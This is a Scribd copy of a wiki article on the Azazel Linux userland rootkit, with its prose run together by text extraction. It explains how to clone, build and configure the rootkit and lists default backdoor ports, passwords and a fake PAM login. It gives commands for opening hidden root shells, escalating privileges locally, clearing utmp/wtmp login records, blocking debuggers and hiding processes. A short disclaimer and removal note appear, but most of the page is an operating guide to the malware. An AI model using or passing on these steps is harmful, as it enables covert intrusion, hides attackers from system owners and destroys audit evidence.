Scribd Logo
Upload

Welcome to Scribd!

  • Azazel Rootkit Features Anti-Debugging and Log Clearing

    Uploaded by

    OmongoleJimJohnson
    108 views6 pages
    Azazel is a Linux userland rootkit written in C that uses LD_PRELOAD technique to hook system calls and hide its presence. It features log cleaning, process hiding, anti-debugging techniques, and includes both plaintext and encrypted backdoors to provide remote interactive shells. The rootkit focuses on evading detection tools like lsof, ps and unhide through techniques like selectively not hooking those programs and obfuscating strings.

    Original Description:

    Azazel

    Original Title

    Azazel

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    Azazel is a Linux userland rootkit written in C that uses LD_PRELOAD technique to hook system calls and hide its presence. It features log cleaning, process hiding, anti-debugging techniques, and includes both plaintext and encrypted backdoors to provide remote interactive shells. The rootkit focuses on evading detection tools like lsof, ps and unhide through techniques like selectively not hooking those programs and obfuscating strings.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    108 views6 pages

    Azazel Rootkit Features Anti-Debugging and Log Clearing

    Uploaded by

    OmongoleJimJohnson
    Azazel is a Linux userland rootkit written in C that uses LD_PRELOAD technique to hook system calls and hide its presence. It features log cleaning, process hiding, anti-debugging techniques, and includes both plaintext and encrypted backdoors to provide remote interactive shells. The rootkit focuses on evading detection tools like lsof, ps and unhide through techniques like selectively not hooking those programs and obfuscating strings.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 6

    Tweet

    Azazel
    FromSecurity101BlackhatTechniquesHackingTutorialsVulnerabilityResearchSecurityTools
    AzazelisauserlandrootkitwritteninCbasedoffoftheoriginalLD_PRELOADtechniquefromJynxrootkit.Itis
    morerobustandhasadditionalfeatures,andfocusesheavilyaroundantidebuggingandantidetection.Features
    includelogcleaning,pcapsubversion,andmore.
    Contents
    1Disclaimer
    2Features
    3LatestSource
    4HookingMethods
    5Configuration
    6BackdoorExamples
    6.1Plaintextbackdoor
    6.2Crypthookbackdoor
    6.3PAMbackdoor
    7LogClearing
    8AntiDebugging
    9ProcessHiding
    10Preliminaryldd/unhideobfuscation
    11Removal
    12Related
    Disclaimer
    Itisacrimetousetechniquesortoolsonthispageagainstanysystemwithoutwritten
    authorizationunlessthesysteminquestionbelongstoyou
    Features
    Antidebugging
    Avoidsunhide,lsof,ps,ldddetection
    Hidesfilesanddirectories
    Hidesremoteconnections
    Hidesprocesses
    Hideslogins
    PCAPhooksavoidlocalsniffing
    TwoacceptbackdoorswithfullPTYshells.
    Crypthookencryptedaccept()backdoor
    Plaintextaccept()backdoor
    PAMbackdoorforlocalprivescandremoteentry
    Logcleanupforutmp/wtmpentriesbasedonpty
    Usesxortoobfuscatestaticstrings
    LatestSource
    Clonethesources
    Terminal
    localhost:~$gitclonehttps://github.com/chokepoint/azazel.git
    Buildtherootkit
    Terminal
    localhost:~$make
    Running"makeinstall"willinjectthelivekitintoyoursystem.Whileremovalisnot
    impossible,it'sanunnecessaryandpainfulprocedure,nottomentionyoumayforgetto
    removeit.
    HookingMethods
    AzazelutilizesthesamehookingmethodsasJynx/Jynx2.Youcanhookindividualprogramsatthetimeof
    executionbytakingadvantageoftheLD_PRELOADvariable.Bydefault,Azazelinstallsitselfaslibselinux.so
    into/lib.Anentryisthenaddedto/etc/ld.so.preloadinordertohooksystemwidedynamicallycompiledprograms.
    Exampleruntimehookingofbash.
    Terminal
    localhost:~$LD_PRELOAD=/lib/libselinux.sobashl
    Insteadofdlsym'ingdirectlibcfunctionsbygloballydeclaringold_syscall,Azazelhasanewstructureinazazel.h
    namedsyscall_list.Thisallowsalloftherequiredfunctionstobelinkeduponinitiationofthelibrary.Syscall
    functionnamesareXORedbyconfig.pyandwrittentoconst.h.Originallibcfunctionscanbeaccessedbyusing
    thepreprocessordefinitionsalsoinconst.h.EachdefinitionhasaprefixofSYS_name_of_function_in_caps.For
    exampletocalllibc'sversionoffopen,youwouldusesyscalls[SYS_FOPEN].syscall_func()
    typedef struct struct_syscalls {
    char syscall_name[51];
    void *(*syscall_func)();
    } s_syscalls;
    Configuration
    Allvariablesthatrequirechangingpriortodeploymentarelocatednearthetopofconfig.py.Variabledatais
    cipheredusinganXORkeyinordertonotexposethemtodumpingprogramslike"strings."Seebelowforalistof
    variablesandtheirassociatedpurpose.
    TherootkitwillhideallTCP/IPconnectionswithintheseHIGHandLOWportranges.
    Theserangesareusedtonotonlyhidefromnetstat/lsof,butalsotohidefromsniffingusing
    libpcap.
    Numeric
    Variable(s) Description Default
    LOW_PORT/
    HIGH_PORT
    PortsusedtotriggerfullPTYplaintextbackdoor. 6104061050
    CRYPT_LOW/
    CRYPT_HIGH
    PortsusedtotriggerfullPTYcrypthookbackdoor. 6105161060
    PAM_PORT Alsohidesthisportbutdoesn'ttriggeracceptbackdoor. 61061
    SHELL_MSG Displaythisstringtousersoncetheygetashell Welcome
    SHELL_PASSWD Shellpasswordforbothplaintextandcrypthookbackdoors changeme
    SHELL_TYPE Usethisshellforaccept()backdoors. /bin/bash
    MAGIC_STRING Hideanyfileswiththisstringinthefilename. __
    BLIND_LOGIN FakeuseraccountusedtoactivatethePAMbackdoor. rootme
    ANTI_DEBUG_MSG Displaythismessagetothesysadminiftheytrytoptrace
    Don'tscratchthe
    walls.
    CLEANUP_LOGS
    Ifthisenvironmentvarissettoavalidpts,thencleanup
    utmp/wtmplogsforthatpts.
    CLEANUP_LOGS
    Thefollowingvariablesarespecificallyincludedforthecrypthookbackdoor.
    Numeric
    Variable(s) Description Default
    PASSPHRASE Thiskeyisusedforencryption/decryptionofsessions HelloNSA
    KEY_SALT Keysaltusedforkeyderivation. changeme
    BackdoorExamples
    Foreachoftheseexamplesweareassumingthatsshdishookedwithazazelandabletotriggeranyofthethree
    operationalbackdoors.
    Plaintextbackdoor
    WeneedtosetthelocalporttosomethingwithintherangesofLOW_PORTandHIGH_PORTasconfigured
    above.Thisnotonlyensuresthattheconnectionwillbehiddenfromlocalsniffinganddetection,butitalsotriggers
    afullPTYinteractiveshelluponenteringthecorrectpassword.Thelocalportcanbesetusingncat'spoption.
    Uponsuccessfulyconnectingtotheremotedaemon,thefirstlineyouentershouldbetheSHELL_PASSWDthat
    youcreated.
    $ ncat target 22 -p 61040
    changeme
    Welcome!
    Here's a shell.
    root@host:/root #
    Crypthookbackdoor
    TriggeringtheCrypthookbackdoorissimilartotheplaintextbackdoor,butweneedtospeakthesameprotocol.
    CrypthookisanAESencryptionwrapperforTCP/UDPconnectionsandcanbedownloadedfromhere.The
    Crypthookreliesonpreloadhookingaswell,andcanbeusedwithnetcatbyutilizingLD_PRELOAD
    environmentvariable.
    $ LD_PRELOAD=./crypthook.so ncat localhost 22 -p 61051
    changeme
    Welcome!
    Here's a shell.
    root@host:/root/ #
    PAMbackdoor
    ThePAMhooksworkbywaitingforthespecifiedfakeusertoattemptaconnection.Thehooksreturnthepw
    entryforrootandacceptanypasswordtoestablishasuccessfullogin.Sincethismethodwouldgenerallybeused
    withsshd,theconnectionwillnotbehiddenunlessyoucanforcesshclienttobindtoalocalportwithinoneofthe
    portranges.Anotherclientsharedlibraryhasbeenincludedtoforceaprogramtobindtoaportthatwe'dliketo
    hide.
    $ make client
    $ LD_PRELOAD=./client.so ssh rootme@localhost
    root@host:/ #
    ThePAMhookscanalsobeusedforlocalprivesc.
    $ su - rootme
    #
    LogClearing
    Logclearingcanbeaccomplishedbysettingtheenvironmentvariabletothetty/ptsdevicethatyouwanttoremove
    fromtherecordsandthenexecutingacommand.Whenaccessingthetargetsystemusingeitheroftheaccept
    backdoors,thegivenpseudoterminalisautomaticallyremovedfrombothutmpandwtmplogfiles.However,ifyou
    needtousethePAMbackdoorthroughSSH,youwillneedtomanuallyremoveyourptsfromthelogsas
    demonstratedbelow.
    $ w | grep pts/16
    root pts/16 :0.0 Wed16 2:33m 0.16s 0.16s bash
    $ CLEANUP_LOGS="pts/16" ls
    utmp logs cleaned up.
    wtmp logs cleaned up.
    $ w | grep pts/16
    $
    AntiDebugging
    Azazelhooksptrace()andreturns1,hencedenyinganydebuggingfromoccuring.Themessagedisplayedtothe
    sysadminisreallymoreofajokethananythingandwilldefinitelysetoffalarmsthatsomethingiswrong.
    $ strace -p $PPID
    Don't scratch the walls
    Thisworksonanyuserlanddebugger(ltrace,strace,gdb,ftrace).Thishookcouldbeeasilyextendedtohide
    specificinformationshouldyoudesiretodoso.
    ProcessHiding
    Jynx/Jynx2reliedonaspecifiedGIDinordertohideprocessesandfiles.Therearesomeobviousproblemswith
    usingthismethod,soAzazeladdressesthisbyagainusingenvironmentvariablestomaskanyprocessesthatmay
    giveawayourpresence.Thevariablecanalsobeconfiguredinsideofconfig.py,butdefaultsto
    HIDE_THIS_SHELL.
    $ env HIDE_THIS_SHELL=plz ncat -l -p 61061
    Whenthisenvironmentvariableisset,theprocessisabletoseefilesandprocesseshiddenbytherootkit.Thisis
    importantforthePAMhook.BecausePAMinvokesbashonitsown,youhavetousethisenvironmentvariableto
    accesshiddenfiles.
    Tweet
    Preliminaryldd/unhideobfuscation
    AzazelavoidsdetectionfromlddandunhidebyselectivelyNOThookingthosetwoprograms.Oncetheprograms
    aredone,azazelcontinueshookingprogramsasnormal.Thisopensupawindowforremovingtheoffending
    library,butatthispointitisbetterthancompletelyrevealingthekit.Thenextreleasewillincludeamoreadvanced
    antidebug/ldd/unhideobfuscation.
    Removal
    ToremoveAzazel,thebestcourseofactionistobootintoalivecd,mountyourbootableharddrive,anddeletethe
    /etc/ld_preload.sofilefromthepartition.
    Related
    Linux
    LD_PRELOAD
    C
    CryptHook(http://www.chokepoint.net/2013/09/crypthooksecuretcpudpconnection.html)
    Jynx
    HookingPAM
    Retrievedfrom"http://www.blackhatlibrary.net/Azazel"
    Thispagewaslastmodifiedon14February2014,at02:34.

    You might also like